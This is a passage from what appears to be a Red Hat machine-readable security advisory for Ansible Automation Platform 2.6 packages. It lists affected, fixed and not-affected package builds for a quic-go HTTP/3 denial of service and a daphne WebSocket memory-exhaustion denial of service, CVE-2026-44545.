"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "github.com/quic-go/quic-go: quic-go: Denial of Service via excessive memory allocation in HTTP/3 trailers"
},
{
"cve": "CVE-2026-44545",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-06-03T15:01:49.007231+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2484377"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in daphne. An unauthenticated remote attacker could exploit this vulnerability by sending arbitrarily large WebSocket messages or frames. This oversight in payload size handling can lead to excessive memory consumption, resulting in a denial of service (DoS) for the affected system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "daphne: daphne: Denial of Service via excessive WebSocket message size",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src"
],
"known_not_affected": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch",
